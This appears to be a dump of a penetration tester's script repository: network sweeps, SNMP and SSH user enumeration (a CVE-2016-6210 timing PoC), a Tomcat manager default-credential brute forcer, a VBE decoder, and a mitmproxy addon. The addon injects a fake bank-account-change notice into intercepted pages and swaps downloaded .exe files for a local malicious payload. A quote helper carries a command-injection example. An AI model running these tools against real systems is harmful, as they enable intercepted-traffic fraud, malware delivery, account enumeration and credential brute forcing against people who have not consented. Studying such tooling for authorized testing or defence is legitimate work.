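    server_cls = HTTPServerV6 if args.ipv6 else server.HTTPServer
    # Named 'httpd' so the http.server module is not shadowed.
    httpd = server_cls((args.addr, args.port), FileHandler)
    if args.https:
        # ssl.wrap_socket() was deprecated in 3.7 and removed in 3.12; an
        # explicit server-side context does the same with current TLS
        # defaults. The PEM file carries both key and certificate (see the
        # openssl line above), so certfile alone is enough.
        ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ssl_ctx.load_cert_chain(certfile=args.https)
        httpd.socket = ssl_ctx.wrap_socket(httpd.socket, server_side=True)
    server_type = 'HTTPS' if args.https else 'HTTP'
    logger.info('Started {} server at {}'.format(server_type, ':'.join([args.addr, str(args.port)])))
    httpd.serve_forever()
--------------------------------------------------------------------------------
/bin/mac_oui.sh:
--------------------------------------------------------------------------------
#!/bin/bash

mac="$(echo $1 | sed 's/ //g' | sed 's/-//g' | sed 's/://g' | cut -c1-6)"

result="$(grep -i -A 4 ^$mac ~/lib/oui.txt)";

if [ "$result" ]; then
    echo "$result"
else
    echo "$1 not found"
fi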
-------------------------------------------------------------------------------- /bin/mitm_toolkit.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | import mitmproxy as mitm 4 | 5 | 6 | class ToolkitBase: 7 | 8 | def __init__(self): 9 | self.current_lab_ip = os.environ['CURRENT_LAB_IP'] 10 | 11 | 12 | class HTML(ToolkitBase): 13 | 14 | def load(self, loader): 15 | loader.add_option( 16 | name='toolkit_inject_html', 17 | typespec=bool, 18 | default=False, 19 | help='Toolkit: Inject HTML' 20 | ) 21 | 22 | def response(self, flow): 23 | if mitm.ctx.options.toolkit_inject_html: 24 | content_type = flow.response.headers.get('Content-Type', '') 25 | if 'text/html' in content_type: 26 | flow.response.replace( 27 | '', 28 | '

Warning!

Our account number has changed, a new one:

Fake Bank UK XXXX XXXXXX

' 29 | ) 30 | 31 | 32 | class NTLM(ToolkitBase): 33 | 34 | def load(self, loader): 35 | loader.add_option( 36 | name='toolkit_ntlm_honeypot', 37 | typespec=bool, 38 | default=False, 39 | help='Toolkit: NTLM Honeypot' 40 | ) 41 | 42 | def response(self, flow): 43 | if mitm.ctx.options.toolkit_ntlm_honeypot: 44 | content_type = flow.response.headers.get('Content-Type', '') 45 | if 'text/html' in content_type: 46 | flow.response.set_content( 47 | flow.response.content.replace( 48 | b'', 49 | bytes( 50 | '', 51 | encoding='utf8' 52 | ) 53 | ) 54 | ) 55 | 56 | 57 | class Exec(ToolkitBase): 58 | 59 | def load(self, loader): 60 | loader.add_option( 61 | name='toolkit_bad_exec', 62 | typespec=bool, 63 | default=False, 64 | help='Toolkit: Bad executable' 65 | ) 66 | 67 | def request(self, flow): 68 | if mitm.ctx.options.toolkit_bad_exec: 69 | if flow.request.pretty_url.endswith('.exe'): 70 | with open('/tmp/malicious.exe', 'rb') as f: 71 | payload = f.read() 72 | mitm.flow.response = mitm.http.HTTPResponse.make( 73 | 200, 74 | payload, 75 | {'Content-Type': 'application/octet-stream'}, 76 | ) 77 | 78 | 79 | addons = [ 80 | HTML(), 81 | NTLM(), 82 | Exec(), 83 | ] 84 | -------------------------------------------------------------------------------- /bin/parse_gnmap.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage:" 5 | echo -e "$0 results.gnmap output_filename" 6 | exit 1 7 | fi 8 | 9 | if [[ ! 
-f "$1" ]]; then 10 | echo "File not found: $1" 11 | exit 1 12 | fi 13 | 14 | INPUT_FILENAME=$1 15 | OUTPUT_FILENAME=$2 16 | 17 | hosts_list() { 18 | IFS=$'\n' read -r -d '' -a tmp_array < <( grep -E "($1)\/open\/$2" $INPUT_FILENAME | cut -d' ' -f2 | sort | uniq && printf '\0' ) 19 | if (( ${#tmp_array[@]} )); then 20 | printf '%s\n' "${tmp_array[@]}" > $OUTPUT_FILENAME-$3-$2 21 | fi 22 | } 23 | 24 | hosts_list '21' tcp ftp 25 | hosts_list '22' tcp ssh 26 | hosts_list '23' tcp telnet 27 | hosts_list '25' tcp smtp 28 | hosts_list '53' tcp dns 29 | hosts_list '53' udp dns 30 | hosts_list '69' udp tftp 31 | hosts_list '80|81|82|443|8000|8008|8080|8081|8082|8443|8888|9000|9080|9443|9888|9990' tcp http 32 | hosts_list '111' tcp rpc 33 | hosts_list '111' udp rpc 34 | hosts_list '113' tcp ident 35 | hosts_list '135' tcp msrpc 36 | hosts_list '139|445' tcp smb 37 | hosts_list '161' tcp snmp 38 | hosts_list '161' udp snmp 39 | hosts_list '1433' tcp mssql 40 | hosts_list '3306' tcp mysql 41 | hosts_list '3389' tcp rdp 42 | hosts_list '5432' tcp pgsql 43 | hosts_list '6000|6001|6002|6003|6004|6005' tcp x11 44 | -------------------------------------------------------------------------------- /bin/ping.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import asyncio 4 | import concurrent.futures 5 | import random 6 | 7 | import click 8 | import netaddr 9 | from scapy import all as scp 10 | 11 | 12 | def scan(ip, timeout, ttl): 13 | packet = scp.IP(dst=str(ip), ttl=ttl) / scp.ICMP() 14 | result = scp.sr1(packet, timeout=timeout, verbose=0) 15 | if not (result is None): 16 | click.echo(click.style('Host {} seems up!'.format(packet[scp.IP].dst), fg='green', bold=True)) 17 | else: 18 | click.echo(click.style('Host {} timed out.'.format(packet[scp.IP].dst), fg='red')) 19 | 20 | 21 | @click.command() 22 | @click.option('--ip-range', '-i', type=str, required=True, help='IP address range (CIDR)') 23 | 
@click.option('--timeout', '-t', type=int, default=1, help='Timeout') 24 | @click.option('--randomize', '-r', is_flag=True, default=False, help='Random order') 25 | @click.option('--ttl', '-l', type=int, default=64, help='TTL') 26 | @click.option('--workers', '-w', type=int, default=4, help='Number of workers (16 suggested as maximum)') 27 | def run(ip_range, timeout, randomize, ttl, workers): 28 | ip_list = list(netaddr.IPNetwork(ip_range).iter_hosts()) 29 | if randomize: 30 | random.shuffle(ip_list) 31 | executor = concurrent.futures.ThreadPoolExecutor(max_workers=workers) 32 | loop = asyncio.get_event_loop() 33 | loop.run_until_complete(asyncio.gather( 34 | *[loop.run_in_executor(executor, scan, ip, timeout, ttl) for ip in ip_list] 35 | )) 36 | 37 | 38 | if __name__ == '__main__': 39 | run() 40 | -------------------------------------------------------------------------------- /bin/ping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | trap "exit" INT 4 | 5 | if [[ -z $1 ]]; then 6 | echo "Usage: $0 192.168.1.0/24" 7 | exit 1 8 | fi 9 | 10 | RED='\033[0;31m' 11 | GREEN='\033[1;32m' 12 | NONE='\033[0m' 13 | 14 | for ip in $(prips $1); do 15 | echo -n "Host $ip seems... " 16 | if ping -W 1 -c 1 $ip &>/dev/null; then 17 | echo -e "${GREEN}up${NONE}" 18 | else 19 | echo -e "${RED}down${NONE}" 20 | fi 21 | done 22 | -------------------------------------------------------------------------------- /bin/quote.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import urllib 5 | 6 | 7 | if __name__ == '__main__': 8 | 9 | parser = argparse.ArgumentParser(description='URI encoding') 10 | parser.add_argument('value', help='E.g. 
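\'ls && touch /tmp/temp\'')
    args = parser.parse_args()

    # The shebang is python3, where `urllib.quote` does not exist (the old
    # call raised AttributeError); the function lives in urllib.parse.
    # Imported here so the top-level `import urllib` stays untouched.
    from urllib.parse import quote
    print(quote(args.value))
--------------------------------------------------------------------------------
/bin/scan_top.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Both arguments are needed: the target and the --top-ports count used for
# the port scan further down (an empty count makes nmap bail out late).
if [[ -z $1 || -z $2 ]]; then
    echo "Usage:"
    echo -e "- with host discovery, target as CIDR (network as output prefix):\n\t$0 10.0.0.0/24 300"
    echo -e "- skip host discovery, targets in a text file (filename as output prefix):\n\t$0 10.0.0.0-hosts 300"
    echo -e
    echo -e "NOTE: If executed as root the script will perform UDP and TCP SYN discovery (recommended anyway)."
    exit 1
fi

if [[ -f "$1" ]]; then
    echo "[*] Targets provided, skipping discovery..."
    FILENAME=$1
    TARGET_HOSTS=$1
else
    TARGET_CIDR=$1
    # Output prefix = network part of the CIDR. The earlier "drop the last
    # three characters" only handled two-digit prefixes such as /24; a /8 or
    # /16 target lost part of the address.
    FILENAME=${TARGET_CIDR%/*}
    TARGET_HOSTS=$FILENAME-hosts
    TCP_PORTS=21,22,23,139,445,80,443,8000,8080,8443,8888,8008,3389,1433,3306,5432,161,162,5900,6000,49152,49153,49154,49155,49156,49157,110,111,113,1311,137,138,143,1723,20,2301,2179,25,27017,389,4443,5061,514,515,587,5901,5984,5985,5986,636,6379,8082,81,82,88,993,995
    UDP_PORTS=111,69,161,53,123
    HOSTS_NUM=`prips $1 | wc -l`
    echo "[*] Basic ping sweep started..."
    nmap -sn -n --randomize-hosts -oA $FILENAME-ping-basic $TARGET_CIDR
    # "Every host is up" almost always means something answers on behalf of
    # the whole range (firewall, proxy ARP); those results are discarded.
    if cat $FILENAME-ping-basic.gnmap | grep "Nmap done" | grep -q "$HOSTS_NUM hosts up"; then
        echo "[*] All $HOSTS_NUM hosts up (in theory), ignoring basic ping results..."
        rm $FILENAME-ping-basic.gnmap
    fi
    echo "[*] Extra TCP ACK sweep with selected ports started..."
    # NOTE(review): the root-only SYN sweep below writes to the same
    # $FILENAME-ping-extra prefix and overwrites this ACK sweep's output.
    nmap -sn -n --randomize-hosts -PA$TCP_PORTS -oA $FILENAME-ping-extra $TARGET_CIDR
    if cat $FILENAME-ping-extra.gnmap | grep "Nmap done" | grep -q "$HOSTS_NUM hosts up"; then
        echo "[*] All $HOSTS_NUM hosts up (in theory), ignoring extra TCP ACK ping results..."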
33 | rm $FILENAME-ping-extra.gnmap 34 | fi 35 | if [ "$(id -u)" == "0" ]; then 36 | echo "[*] Extra TCP SYN sweep with selected ports started..." 37 | nmap -sn -n --randomize-hosts -PS$TCP_PORTS -oA $FILENAME-ping-extra $TARGET_CIDR 38 | echo "[*] Extra sweep with selected UDP ports started..." 39 | nmap -sn -n --randomize-hosts -PU$UDP_PORTS -oA $FILENAME-ping-udp $TARGET_CIDR 40 | fi 41 | grep "Status: Up" $FILENAME-ping*.gnmap | cut -d" " -f2 | sort | uniq > $TARGET_HOSTS 42 | fi 43 | 44 | TOP_PORTS=$2 45 | 46 | 47 | echo "[*] Scanning top $TOP_PORTS ports..." 48 | nmap -Pn -n --randomize-hosts -v --open --top-ports $TOP_PORTS -iL $TARGET_HOSTS -oA $FILENAME-ports-top-$TOP_PORTS 49 | 50 | echo "[*] Parsing results..." 51 | parse_gnmap.sh $FILENAME-ports-top-$TOP_PORTS.gnmap $FILENAME-ports-top-$TOP_PORTS 52 | -------------------------------------------------------------------------------- /bin/snmp_enum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 192.168.1.0/24" 5 | exit 1 6 | fi 7 | 8 | for ip in $(prips $1); do 9 | echo $ip; 10 | for str in $(cat /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt); do 11 | if snmpwalk -OsS -v 1 -c $str $ip &>/dev/null; then 12 | echo $str 13 | break 14 | fi 15 | done 16 | done 17 | -------------------------------------------------------------------------------- /bin/snmp_public_hosts.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 hosts.txt" 5 | exit 1 6 | fi 7 | 8 | for host in $(cat "$1"); do 9 | snmp-check -c public $host 10 | done 11 | -------------------------------------------------------------------------------- /bin/ssh_enum_time.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # CVEs: CVE-2016-6210 (Credits for 
this go to Eddie Harari) 4 | # 5 | # Author: 0_o -- null_null 6 | # nu11.nu11 [at] yahoo.com 7 | # Oh, and it is n-u-one-one.n-u-one-one, no l's... 8 | # Wonder how the guys at packet storm could get this wrong :( 9 | # 10 | # Date: 2016-07-19 11 | # 12 | # Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. 13 | # 14 | # Prerequisites: Network access to the SSH daemon. 15 | # 16 | # DISCLAIMER: Use against your own hosts only! Attacking stuff you are not 17 | # permitted to may put you in big trouble! 18 | # 19 | # And now - the fun part :-) 20 | # 21 | 22 | 23 | import paramiko 24 | import time 25 | import numpy 26 | import argparse 27 | import sys 28 | 29 | args = None 30 | 31 | 32 | class bcolors: 33 | HEADER = '\033[95m' 34 | OKBLUE = '\033[94m' 35 | OKGREEN = '\033[92m' 36 | WARNING = '\033[93m' 37 | FAIL = '\033[91m' 38 | ENDC = '\033[0m' 39 | BOLD = '\033[1m' 40 | UNDERLINE = '\033[4m' 41 | 42 | 43 | def get_args(): 44 | parser = argparse.ArgumentParser() 45 | group = parser.add_mutually_exclusive_group() 46 | parser.add_argument("host", type=str, help="Give SSH server address like ip:port or just by ip") 47 | group.add_argument("-u", "--user", type=str, help="Give a single user name") 48 | group.add_argument("-U", "--userlist", type=str, help="Give a file containing a list of users") 49 | parser.add_argument("-e", "--enumerated", action="store_true", help="Only show enumerated users") 50 | parser.add_argument("-s", "--silent", action="store_true", help="Like -e, but just the user names will be written to stdout (no banner, no anything)") 51 | parser.add_argument("--bytes", default=50000, type=int, help="Send so many BYTES to the SSH daemon as a password") 52 | parser.add_argument("--samples", default=12, type=int, help="Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users") 53 | parser.add_argument("--factor", default=3.0, type=float, help="Used to compute the upper timing boundary for user 
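enumeration")
    parser.add_argument("--trials", default=1, type=int, help="try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary")
    args = parser.parse_args()
    return args


def get_banner(host, port):
    """Return the version string advertised by the SSH daemon at host:port.

    Authentication with junk credentials is expected to fail; the banner is
    read from the transport afterwards. Always returns a str: a placeholder
    when no transport was established (connection refused/reset) or, in the
    unlikely case that the junk login succeeded, so that callers can
    concatenate it without a TypeError.
    """
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    banner = '(no banner)'
    try:
        ssh.connect(hostname=host, port=port, username='invalidinvalidinvalid', password='invalidinvalidinvalid')
    except Exception:
        pass
    transport = ssh.get_transport()
    if transport is not None and transport.remote_version:
        banner = transport.remote_version
    ssh.close()
    return banner


def connect(host, port, user):
    """Time one password-auth attempt for *user*; returns seconds as float.

    A long junk password (args.bytes) is sent; the server hashing it only
    for existing users is the CVE-2016-6210 signal. That delay happens on
    the remote side, so wall-clock time is what must be measured:
    perf_counter() is used instead of process_time(), which only counted
    this process's CPU time and excluded the time spent blocked on the
    socket waiting for sshd.
    """
    global args
    p = 'B' * int(args.bytes)
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    starttime = time.perf_counter()
    # Only updated on the expected failure path; an unexpected successful
    # login yields 0.0 instead of a negative value as before.
    endtime = starttime
    try:
        ssh.connect(hostname=host, port=port, username=user, password=p, look_for_keys=False, gss_auth=False, gss_kex=False, gss_deleg_creds=False, gss_host=None, allow_agent=False)
    except Exception:
        endtime = time.perf_counter()
    finally:
        ssh.close()
    return endtime - starttime


def main():
    global args
    args = get_args()
    if not args.silent:
        print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
    if not args.silent:
        print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\n\n")
    if args.host:
        host = args.host.split(":")[0]
        try:
            port = int(args.host.split(":")[1])
        except IndexError:
            port = 22
    users = []
    if args.user:
        users.append(args.user)
    elif args.userlist:
        with open(args.userlist, "r") as f:
            users = f.readlines()
    else:
        if not args.silent:
            print(bcolors.FAIL + "[!] 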
" + bcolors.ENDC + "You must give a user or a list of users") 109 | sys.exit() 110 | if not args.silent: 111 | print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC + ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC) 112 | # get baseline timing for non-existing users... 113 | baseline_samples = [] 114 | baseline_mean = 0.0 115 | baseline_deviation = 0.0 116 | if not args.silent: 117 | sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users") 118 | for i in range(1, int(args.samples) + 1): 119 | if not args.silent: 120 | sys.stdout.write('.') 121 | if not args.silent: 122 | sys.stdout.flush() 123 | sample = connect(host, port, 'foobar-bleh-nonsense' + str(i)) 124 | baseline_samples.append(sample) 125 | if not args.silent: 126 | sys.stdout.write('\n') 127 | # remove the biggest and smallest value 128 | baseline_samples.sort() 129 | baseline_samples.pop() 130 | baseline_samples.reverse() 131 | baseline_samples.pop() 132 | # do math 133 | baseline_mean = numpy.mean(numpy.array(baseline_samples)) 134 | baseline_deviation = numpy.std(numpy.array(baseline_samples)) 135 | if not args.silent: 136 | print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.") 137 | if not args.silent: 138 | print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.") 139 | upper = baseline_mean + float(args.factor) * baseline_deviation 140 | if not args.silent: 141 | print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.") 142 | if not args.silent: 143 | print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...") 144 | # 145 | # Get timing for the given user name... 
146 | # 147 | for u in users: 148 | user = u.strip() 149 | enum_samples = [] 150 | enum_mean = 0.0 151 | for t in range(0, int(args.trials)): 152 | timeval = connect(host, port, user) 153 | enum_samples.append(timeval) 154 | enum_mean = numpy.mean(numpy.array(enum_samples)) 155 | if (enum_mean < upper): 156 | if not (args.enumerated or args.silent): 157 | print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean)) 158 | else: 159 | if not args.silent: 160 | print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean)) 161 | else: 162 | print(user) 163 | 164 | 165 | if __name__ == '__main__': 166 | main() 167 | -------------------------------------------------------------------------------- /bin/tomcat_brute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import requests 5 | 6 | 7 | PASSWD = [ 8 | ('tomcat', ''), 9 | ('admin', ''), 10 | ('admin', 'admin'), 11 | ('admin', 'tomcat'), 12 | ('tomcat', 'tomcat'), 13 | ('manager', 'manager'), 14 | ('tomcat', 'admin'), 15 | ('manager', 'admin'), 16 | ('tomcat', 's3cret'), 17 | ('root', 'root'), 18 | ('ADMIN', 'ADMIN'), 19 | ('tomcat', 'admanager'), 20 | ('tomcat', 'adrole1'), 21 | ('tomcat', 'adroot'), 22 | ('tomcat', 'adtomcat'), 23 | ('tomcat', 'advagrant'), 24 | ('tomcat', 'changethis'), 25 | ('tomcat', 'password'), 26 | ('tomcat', 'password1'), 27 | ('admin', 'admanager'), 28 | ('admin', 'adrole1'), 29 | ('admin', 'adroot'), 30 | ('admin', 'adtomcat'), 31 | ('admin', 'advagrant'), 32 | ('admin', 'password'), 33 | ('admin', 'password1'), 34 | ('admin', 'Password1'), 35 | ('admin', 'vagrant'), 36 | ('manager', 'admanager'), 37 | ('manager', 'adrole1'), 38 | ('manager', 'adroot'), 39 | ('manager', 'adtomcat'), 40 | ('manager', 'advagrant'), 41 | ('both', 'admanager'), 42 | ('both', 'admin'), 43 | ('both', 'adrole1'), 44 | ('both', 'adroot'), 45 | ('both', 'adtomcat'), 46 | ('both', 
'advagrant'), 47 | ('both', 'tomcat'), 48 | ('demo', 'demo'), 49 | ('role', 'changethis'), 50 | ('role1', 'admanager'), 51 | ('role1', 'admin'), 52 | ('role1', 'adrole1'), 53 | ('role1', 'adroot'), 54 | ('role1', 'adtomcat'), 55 | ('role1', 'advagrant'), 56 | ('role1', 'role1'), 57 | ('role1', 'tomcat'), 58 | ('root', 'admanager'), 59 | ('root', 'admin'), 60 | ('root', 'adrole1'), 61 | ('root', 'adroot'), 62 | ('root', 'adtomcat'), 63 | ('root', 'advagrant'), 64 | ('root', 'changethis'), 65 | ('root', 'password'), 66 | ('root', 'password1'), 67 | ('root', 'Password1'), 68 | ('root', 'r00t'), 69 | ('root', 'toor'), 70 | ('tomcat', 'ads3cret'), 71 | ('admin', 'ads3cret'), 72 | ('manager', 'ads3cret'), 73 | ('both', 'ads3cret'), 74 | ('role1', 'ads3cret'), 75 | ('root', 'ads3cret'), 76 | ('ovwebusr', 'OvW*busr1'), 77 | ('server_admin', 'owaspbwa'), 78 | ('admin', 'owaspbwa'), 79 | ('root', 'owaspbwa'), 80 | ('xampp', 'xampp'), 81 | ('cxsdk', 'kdsxc'), 82 | ('j2deployer', 'j2deployer'), 83 | ('QCC', 'QLogic66'), 84 | ] 85 | 86 | 87 | if __name__ == '__main__': 88 | 89 | parser = argparse.ArgumentParser( 90 | description='Apache Tomcat bruteforce utility', 91 | formatter_class=argparse.ArgumentDefaultsHelpFormatter 92 | ) 93 | parser.add_argument('-u', '--url', help='E.g. 
"http://localhost:8080/manager/html"', required=True) 94 | args = parser.parse_args() 95 | print(f'Checking {args.url}...') 96 | for cred in PASSWD: 97 | req = requests.get(args.url, auth=cred) 98 | if req.status_code == 200: 99 | print(f'Worked: {cred[0]}:{cred[1]}') 100 | break 101 | else: 102 | print(f'Failed: {cred[0]}:{cred[1]}') 103 | -------------------------------------------------------------------------------- /bin/vba_format.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import click 4 | 5 | 6 | def vb_wrap(val): 7 | return f'& "{val}" _' 8 | 9 | 10 | @click.command() 11 | @click.option('--body', '-b', type=str, required=True, help='Input string') 12 | @click.option('--line-length', '-l', type=int, default=30, required=True, help='Maximum line length') 13 | def run(body, line_length): 14 | i = 0 15 | if len(body) > line_length: 16 | print('"' + body[0:line_length] + '" _') 17 | for x in range(1, len(body) // line_length): 18 | i = x * line_length 19 | print(vb_wrap(body[i:i + line_length])) 20 | print('& "' + body[i + line_length:] + '"') 21 | else: 22 | print(body) 23 | 24 | 25 | if __name__ == '__main__': 26 | run() 27 | -------------------------------------------------------------------------------- /bin/vbe_decoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __description__ = 'Decode an encoded VBScript, often seen as a .vbe file' 4 | __author__ = 'John Hammond' 5 | __date__ = '02/10/2021' 6 | 7 | """ 8 | Credit for this baseline code goes to Didier Stevens, from his original repo. 9 | https://github.com/DidierStevens/DidierStevensSuite/blob/master/decode-vbe.py 10 | 11 | All I have done is merely cleaned the code a bit, made it Python3 friendly, 12 | and handled support for multiple #@~...#~@ markings. 
13 | """ 14 | 15 | import argparse 16 | import sys 17 | import os 18 | from colorama import Fore, Style 19 | import re 20 | 21 | 22 | parser = argparse.ArgumentParser(description=__description__) 23 | parser.add_argument('files', metavar='file', type=str, nargs='+', help='file to decode') 24 | parser.add_argument('-o', '--output', metavar='output', type=str, default=None, help='output file (default stdout)') 25 | args = parser.parse_args() 26 | 27 | 28 | def decode_data(data: str): 29 | 30 | # Magic number used for the VBE voodoo magic below 31 | decoding_offset = 9 32 | 33 | # Decoding mapping for unique bytes in the encoded scheme 34 | decodings = ['\x57\x6E\x7B', '\x4A\x4C\x41', '\x0B\x0B\x0B', '\x0C\x0C\x0C', '\x4A\x4C\x41', '\x0E\x0E\x0E', '\x0F\x0F\x0F', '\x10\x10\x10', '\x11\x11\x11', '\x12\x12\x12', '\x13\x13\x13', '\x14\x14\x14', '\x15\x15\x15', '\x16\x16\x16', '\x17\x17\x17', '\x18\x18\x18', '\x19\x19\x19', '\x1A\x1A\x1A', '\x1B\x1B\x1B', '\x1C\x1C\x1C', '\x1D\x1D\x1D', '\x1E\x1E\x1E', '\x1F\x1F\x1F', '\x2E\x2D\x32', '\x47\x75\x30', '\x7A\x52\x21', '\x56\x60\x29', '\x42\x71\x5B', '\x6A\x5E\x38', '\x2F\x49\x33', '\x26\x5C\x3D', '\x49\x62\x58', '\x41\x7D\x3A', '\x34\x29\x35', '\x32\x36\x65', '\x5B\x20\x39', '\x76\x7C\x5C', '\x72\x7A\x56', '\x43\x7F\x73', '\x38\x6B\x66', '\x39\x63\x4E', '\x70\x33\x45', '\x45\x2B\x6B', '\x68\x68\x62', '\x71\x51\x59', '\x4F\x66\x78', '\x09\x76\x5E', '\x62\x31\x7D', '\x44\x64\x4A', '\x23\x54\x6D', '\x75\x43\x71', '\x4A\x4C\x41', '\x7E\x3A\x60', '\x4A\x4C\x41', '\x5E\x7E\x53', '\x40\x4C\x40', '\x77\x45\x42', '\x4A\x2C\x27', '\x61\x2A\x48', '\x5D\x74\x72', '\x22\x27\x75', '\x4B\x37\x31', '\x6F\x44\x37', '\x4E\x79\x4D', '\x3B\x59\x52', '\x4C\x2F\x22', '\x50\x6F\x54', '\x67\x26\x6A', '\x2A\x72\x47', '\x7D\x6A\x64', '\x74\x39\x2D', '\x54\x7B\x20', '\x2B\x3F\x7F', '\x2D\x38\x2E', '\x2C\x77\x4C', '\x30\x67\x5D', '\x6E\x53\x7E', '\x6B\x47\x6C', '\x66\x34\x6F', '\x35\x78\x79', '\x25\x5D\x74', '\x21\x30\x43', '\x64\x23\x26', 
'\x4D\x5A\x76', '\x52\x5B\x25', '\x63\x6C\x24', '\x3F\x48\x2B', '\x7B\x55\x28', '\x78\x70\x23', '\x29\x69\x41', '\x28\x2E\x34', '\x73\x4C\x09', '\x59\x21\x2A', '\x33\x24\x44', '\x7F\x4E\x3F', '\x6D\x50\x77', '\x55\x09\x3B', '\x53\x56\x55', '\x7C\x73\x69', '\x3A\x35\x61', '\x5F\x61\x63', '\x65\x4B\x50', '\x46\x58\x67', '\x58\x3B\x51', '\x31\x57\x49', '\x69\x22\x4F', '\x6C\x6D\x46', '\x5A\x4D\x68', '\x48\x25\x7C', '\x27\x28\x36', '\x5C\x46\x70', '\x3D\x4A\x6E', '\x24\x32\x7A', '\x79\x41\x2F', '\x37\x3D\x5F', '\x60\x5F\x4B', '\x51\x4F\x5A', '\x20\x42\x2C', '\x36\x65\x57'] 35 | 36 | # The combination switching for the encoded bytes 37 | combinations = [0, 1, 2, 0, 1, 2, 1, 2, 2, 1, 2, 1, 0, 2, 1, 2, 0, 2, 1, 2, 0, 0, 1, 2, 2, 1, 0, 2, 1, 2, 2, 1, 0, 0, 2, 1, 2, 1, 2, 0, 2, 0, 0, 1, 2, 0, 2, 1, 0, 2, 1, 2, 0, 0, 1, 2, 2, 0, 0, 1, 2, 0, 2, 1] 38 | 39 | # Replace the data with some strings we already know the meaning of 40 | replacements = [('@&', chr(10)), ('@#', chr(13)), ('@*', '>'), ('@!', '<'), ('@$', '@')] 41 | for replacement in replacements: 42 | to_replace, replace_with = replacement 43 | data = data.replace(to_replace, replace_with) 44 | 45 | # Now that it is prepared, replace all the other encoded data 46 | result = [] 47 | index = -1 48 | bad_bytes = [60, 62, 64] 49 | for char in data: 50 | byte = ord(char) 51 | if byte < 128: 52 | index = index + 1 53 | if ((byte == decoding_offset) or (byte > 31 and byte < 128) and (byte not in bad_bytes)): 54 | # Do the translation to get the right byte 55 | char = [c for c in decodings[byte - decoding_offset]][combinations[index % 64]] 56 | result.append(char) 57 | return ''.join(result) 58 | 59 | 60 | def fatal_error(message: str): 61 | """ 62 | Convenience function to display an error message and quit. 
63 | """ 64 | sys.stderr.write(f'[{Fore.RED}{Style.BRIGHT}!{Style.RESET_ALL}{Fore.RESET}] fatal error, {str(message)}\n') 65 | sys.exit(-1) 66 | 67 | 68 | def success(message: str): 69 | """ 70 | Convenience function to display a success message and quit. 71 | """ 72 | sys.stderr.write(f'[{Fore.GREEN}{Style.BRIGHT}+{Style.RESET_ALL}{Fore.RESET}] success, {str(message)}\n') 73 | 74 | 75 | def validate_files(files: list): 76 | """ 77 | Check if the supplied files actually exist and are in fact files 78 | """ 79 | for file in files: 80 | if not os.path.exists(file): 81 | fatal_error(f'supplied file "{str(file)}" does not exist') 82 | if not os.path.isfile(file): 83 | fatal_error(f'supplied file "{str(file)}" is not a file (maybe directory?)') 84 | 85 | 86 | def decode_files(files: list): 87 | output = [] 88 | for file in files: 89 | output.append(decode_file(file)) 90 | 91 | return '\n'.join(output) 92 | 93 | 94 | def decode_file(file): 95 | try: 96 | handle = open(file, 'r') 97 | contents = handle.read() 98 | except Exception as e: 99 | fatal_error(f'{e.message}') 100 | finally: 101 | handle.close() 102 | 103 | encoded_data = re.findall(r'#@~\^......==(.+)......==\^#~@', contents) 104 | 105 | decoded_data = [] 106 | for data in encoded_data: 107 | decoded_data.append(decode_data(data)) 108 | 109 | return '\n'.join(decoded_data) 110 | 111 | 112 | def main(): 113 | """ 114 | Decode an encoded VBScript, often seen as a .vbe file 115 | """ 116 | 117 | # Ensure we can work with these files, and then decode them 118 | validate_files(args.files) 119 | output = decode_files(args.files) 120 | 121 | # Return the results as requested. 
